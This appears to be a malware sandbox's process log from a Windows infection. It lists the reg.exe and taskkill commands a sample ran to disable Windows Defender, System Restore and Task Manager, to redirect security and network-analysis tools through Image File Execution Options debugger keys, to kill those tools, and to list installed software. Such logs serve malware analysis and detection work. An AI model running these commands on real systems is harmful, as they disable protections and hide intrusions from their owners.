C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1880
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:2040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1872
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:560
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:852
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:672
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:760
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1380
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1756
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1564
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1692
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:456
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:324
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1904
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1932
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1948
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1928
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1616
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1180
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1460
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1344
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1672
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1340
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1056
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1952
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1636
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:844
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1644
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1480
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1840
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1828
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:1732
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1064
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1480
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1900
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1836
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1612
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:320
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:652
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:1512
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1396
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1544
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:1104
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1388
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1340
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1816
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1344
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1664
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1516
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1768
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:760
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1180
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1036
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1920
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1500
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1072
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1388
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1804
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1900
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1856
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1180
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:740
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1396
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1548
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1484
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1340
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1164
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1816
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1564
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1612
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1544
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1932
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1228
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:740
-
-
-
